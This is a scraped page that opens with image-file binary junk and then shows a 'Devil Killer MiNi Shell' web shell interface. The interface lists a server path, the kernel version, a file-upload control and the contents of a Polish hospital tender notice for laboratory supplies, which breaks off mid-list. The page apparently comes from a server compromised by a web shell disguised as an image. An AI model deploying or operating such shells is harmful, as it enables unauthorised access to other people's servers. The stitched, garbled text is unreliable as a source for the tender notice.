JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/0017879601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów laboratoryjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytecki Szpital Ortopedyczno - Rehabilitacyjny w Zakopanem</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000296377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Oswalda Balzera 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@klinika.net.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.klinika.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów laboratoryjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a94f0cd9-6630-4327-80e3-e4f46dde1878</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00178796</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038703/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.18 Dostawa materiałów laboratoryjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.klinika.net.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy zakupowej znajdującej się pod adresem: https://usorwzakopanem.ezamawiajacy.pl.<br/>2. We wszelkich kontaktach z Zamawiającym Wykonawcy powinni powoływać się na numer procedury przetargowej: ZP-271-6/2025.<br/>3. Za datę wpływu oferty, oświadczeń, wniosków, zawiadomień oraz informacji przekazywanych na platformę Zamawiającego przyjmuje się datę ich złożenia/wysłania na Platformę.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452 ze zm.) - zwanego dalej „Rozporządzeniem&#34;, określa dopuszczalny format podpisania kwalifikowanym podpisem elektronicznym podpisem zaufanym lub podpisem osobistym, jako:<br/>1). dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2). dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem; w związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem.<br/>3). Zamawiający, zgodnie z art. 67 ustawy określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c)	zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d)	włączona obsługa JavaScript;<br/>e)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie „.pdf”.<br/>8. Zamawiający zgodnie z § 2 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: pdf., excel., doc., zip.<br/>9. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Otwarcie pliku możliwe jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>10. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Instytutu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-271-6/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> elektroda jonoselektywna mierząca poziom jonów sodowych w surowicy, kompatybilna z analizatorem EasyElectrolytes; głębokość 4cm, szerokość 1,5cm, wysokość 1cm, próbnik z tyłu, droga przepływu w środku, od góry, zabezpieczona dwoma uszczelkami 2	szt.<br/>elektroda jonoselektywna mierząca poziom jonów potasowych w surowicy, kompatybilna z analizatorem EasyElectrolytes; głębokość 4cm, szerokość 1,5cm, wysokość 1cm, próbnik z tyłu, droga przepływu w środku, od góry, zabezpieczona dwoma uszczelkami 2	szt.<br/>elektroda jonoselektywna mierząca poziom jonów chlorkowych w surowicy, kompatybilna z analizatorem EasyElectrolytes; głębokość 4cm, szerokość 1,5cm, wysokość 1cm, próbnik z tyłu, droga przepływu w środku, od góry, zabezpieczona dwoma uszczelkami	2	szt.<br/>elektroda referentyjna dla elektrod jonoselektywnych, kompatybilna z analizatorem Easy Electrolytes; głębokość 4cm, szerokość w najszerszym punkcie 4cm, w najcieńszym punkcie 1cm, wysokość 5,5cm, droga przepływu w środku, od góry, zabezpieczona dwoma uszczelkami	2	szt.<br/>próbnik do pobierania surowicy pacjenta kompatybilny z aparatem Easy Electrolytes	1	szt.<br/>wężki przepływowe z dwoma mocowaniami zewnętrznymi oraz dwoma mocowaniami wewnętrznymi odgraniczającymi silnik od części swobodnego przepływu	1	szt.<br/>zestaw odczynnikowy kompatybilny z analizatorem EasyElectrolytes, służący do oznaczania jonów Na+, K+ oraz Cl-, z magnesem mocującym, trzema otworami wlotowymi, oraz jednym otworem wylotowym, zbierającym ścieki; 22cm szerokości	4	szt.<br/>zestaw odczynnikowy surowic kontrolnych (kontrola wodna) kompatybilny z analizatorem EasyElectrolytes służący do oznaczania kontroli wewnątrzlaboratoryjnej, z których można oznaczyć stężenie jonów sodowych, potasowych oraz chlorkowych na trzech różnych poziomach: niskim, normalnym i wysokim	9	op. (1 butelka L, 1 butelka N, 1 butelka H - każda po 10ml) pojemniki z pepsyną w proszku wraz z butelką kwasu solnego, która po dolaniu do pepsyny w odpowiedniej ilości aktywuje enzym (uzyskując pH 1,0-3,0)- zestaw do konserwacji analizatora	3	op.<br/>pięciolitrowy pojemnik lizatu służący do lizy erytrocytów, kompatybilny z analizatorem Medonic M32M	14	szt.<br/>dwudziestolitrowy pojemnik diluentu służący do rozcienczania próbki badanej, kompatybilny z analizatorem Medonic M32M	14	szt.<br/>zestaw trzech płynów konserwujących służących do precyzyjnej konserwacji kompatybilny z analizatorem Medonic M-Series, składający się z: płynu czyszczącego zawierającego enzymy, płynu czyszczącego zawierającego 2% podchloryn oraz detergentu	1	op. (1 butelka cleanera, 1 butelka podchlorynu i 1 butelka detergentu)<br/>próbnik do pobierania lizatu kompatybilny z analizatorem Medonic M32M Series	1	szt.<br/>próbnik do pobierania diluentu kompatybilny z analizatorem Medonic M32M Series	1	szt.<br/>krew pełna służących do kontroli wewnątrzlaboratoryjnej morfologii (3Diff): poziom niski, kompatybilny z analizatorem Medonic M32M	24	szt.<br/>krew pełna służących do kontroli wewnątrzlaboratoryjnej morfologii (3Diff): poziom normalny, kompatybilny z analizatorem Medonic M32M	24	szt.<br/>krew pełna służących do kontroli wewnątrzlaboratoryjnej morfologii (3Diff): poziom wysoki, kompatybilny z analizatorem Medonic M32M	24	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Probówka hermetyczna, wykonana z PET, zawierająca antykoagulant EDTA-K2, do pobierania w układnie zamkniętym krwi do objętości 2,0ml, o wymiarach probówki 13 x 75 mm. Opakowanie probówek - 100 sztuk. 70	op.<br/>Probówka hermetyczna, wykonana z PET, zawierająca aktywator wykrzepiania, do pobierania w układnie zamkniętym krwi do objętości 6,0ml, o wymiarach probówki 13 x 100 mm. Opakowanie probówek - 100 sztuk. 60	op.<br/>Probówka hermetyczna, wykonana z PET, zawierająca aktywator wykrzepiania, do pobierania w układnie zamkniętym krwi do objętości 4,0ml, o wymiarach probówki 13 x 75 mm. Opakowanie probówek - 100 sztuk. 45	op.<br/>Probówka hermetyczna, wykonana z PET, zawierająca antykoagulant 3,2% cytrynian sodowy, do pobierania w układnie zamkniętym krwi do objętości 2,7ml, o wymiarach probówki 13 x 75 mm. Opakowanie probówek - 100 sztuk. 35	op.<br/>Probówka hermetyczna, wykonana z PET, zawierająca antykoagulant heparynę litową, do pobierania w układnie zamkniętym krwi do objętości 4,0ml, o wymiarach probówki 13 x 75 mm. Opakowanie probówek - 100 sztuk. 20	op.<br/>Igła motylkowa 0,8mm, 21G, 19mm, z wężykiem długości 305mm i zaworkiem. Opakowanie igieł - 50 sztuk. 40	op.<br/>Igła typu Flashback 0,8mm, 21G, 25mm. Opakowanie igieł - 50 sztuk. 85 op.<br/>Jednorazowe uchwyty do mocowania igieł, pakowane w opakowania po 1000 sztuk 7	op.<br/>Adapter typu Luer do pobierania krwi z cewnika lub kaniuli typu Luer. Opakowanie - 1000 sztuk. 2	op.<br/>Bezpieczna igła do pobierania krwi, z zabezpieczeniem, 0,8mm, 21G, 25mm, połączona z uchwytem jednorazowego użytku. Opakowanie igieł - 50 sztuk. 10	op.<br/> Bezpieczna igła do pobierania krwi, z zabezpieczeniem, 0,8mm, 21G, 25mm. Opakowanie igieł - 50 sztuk. 10	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odczynnik służący do oznaczania PT kompatybilny z analizatorem K3002 Optic - opakowania z butelkami o pojemności 8ml. Opakowanie- 5 szt.	25	op.<br/>przezroczyste kuwety optyczne wkładana do kanałów pomiarowych kompatybilne z analizatorem K3002 Optic.Opakowanie - 500 szt.	30	op.<br/>próbki kontrolne służące do oznaczania kontroli wewnątrzlaboratoryjnej PT i APTT kompatybilne z analizatorem K3002 Optic - poziom normalny - opakowania z butelkami o pojemności 1ml. Opakowanie - 10 szt.	10	op.<br/>próbki kontrolne służące do oznaczania kontroli wewnątrzlaboratoryjnej PT i APTT kompatybilne z analizatorem K3002 Optic - poziom niski - opakowania z butelkami o pojemności 1ml. Opakowanie - 10 szt. 10	op.<br/>próbki kontrolne służące do oznaczania kontroli wewnątrzlaboratoryjnej PT i APTT kompatybilne z analizatorem K3002 Optic - poziom wysoki - opakowania z butelkami o pojemności 1ml. Opakowanie - 10 szt. 10	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> opakowania zawierające paski testowe do oznaczania poziomu przeciwciał anty-HBs kompatybilne z analizatorem VIDAS III, razem z zestawem kalibratorów oraz kontroli wewnątrzlaboratoryjnej, opakowanie 60 pasków 2	op.<br/>opakowania zawierające paski testowe do oznaczania poziomu antygenu HBs kompatybilne z analizatorem VIDAS III, razem z zestawem kalibratorów oraz kontroli wewnątrzlaboratoryjnej, opakowanie 60 pasków	45	op.<br/>opakowania zawierające paski testowe do oznaczania poziomu HCG kompatybilne z analizatorem VIDAS III, razem z zestawem kalibratorów oraz kontroli wewnątrzlaboratoryjnej, opakowanie 60 pasków	8	op.<br/>opakowania zawierające paski testowe do jednoczesnego oznaczania przeciwciał i antygenu HIV kompatybilne z analizatorem VIDAS III, razem z zestawem kalibratorów oraz kontroli wewnątrzlaboratoryjnej, opakowanie 60 pasków 45	op.<br/>opakowania zawierające paski testowe do oznaczania poziomu przeciwciał anty-HCV kompatybilne z analizatorem VIDAS III, razem z zestawem kalibratorów oraz kontroli wewnątrzlaboratoryjnej, opakowanie 60 pasków 45	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jednorazowe pipety transportowe Pasteura o pojemności 3 mililitrów, pakowane w opakowania po 500 szt. 14	op.<br/>probówki typu eppendorf o pojemności 1,5ml, mieszczące się w probówkach o średnicy 13mm, pakowane w opakowania po 500 szt. 15	op.<br/>Sterylne pojemniki na mocze - o pojemności 120 mililitrów, pakowane w opakowania po 100 szt. 17	op.<br/>jednorazowe probówki plastikowe do badania osadu moczu o pojemności 12ml, pakowane w opakowania po 100 szt. 18	op.<br/>jednorazowe prówki plastikowe o pojemności 20ml, pakowane w opakowania po 100 szt. 20	op.<br/>jednorazowe prówki plastikowe o pojemności 4ml, pakowane w opakowania po 500 szt.	10	op.<br/>jednorazowe końcówki do pipet o poj. 1000ul, kompatybilne z pipetami jednokanałowymi stałoobiętościowymi produkowanymi przez firmę Medlab - pakowane w opakowania po 500szt.	1	op.<br/>jednorazowe końcówki do pipet o poj. 200ul, kompatybilne z pipetami jednokanałowymi stałoobiętościowymi produkowanymi przez firmę Medlab - pakowane w opakowania po 1000 szt. 30	op.<br/>Zatyczki do kapilar do gazometrii o poj. 100 ul - pakowane w opakowania po 500szt	1	op.<br/>Mieszadełka do kapilar do gazometrii o poj. 100 ul - pakowane w opakowania po 500 szt.	1	op.<br/>Nożyki hematologiczne do nacięcia skóry w celu pobrania krwi z palca lub płatka ucha - pakowane w opakowania po 200 szt.	1	op.<br/>Pisaki do pisania po szkle, &#34;Sharpie&#34;, czarne, pakowane po 12 szt.	2	op.<br/>jednorazowe końcówki do pipet o poj. 5000ul, kompatybilne z pipetami jednokanałowymi stałoobiętościowymi produkowanymi przez firmę Medlab - pakowane w opakowania po 200 szt.	1	op.<br/>Kamera Pentasquare do badań osadu moczu z 14ul osadu moczu, zawierająca okienka na 10 badań, pakowana w opakowania po 100 szt.	3	op.<br/>Szklane szkiełka podstawowe &#34;superior&#34; z ciętymi krawędziami, gładkie, pakowane po 50 szt. 2	op.<br/>Szklane kapilary opylone heparyną, do pobierania krwi gazometrycznej, o objętości minimum 100ul, pakowane w opakowania po 4x250 szt.	1	op.<br/>jednorazowe probówki plastikowe o pojemności 3ml, pakowane w opakowania po 500 szt. 8	op.<br/>Pipeta jednokanałowa stałopojemnościowa 50 μl 2	szt.<br/>Pipeta jednokanałowa stałopojemnościowa 100 μl 3	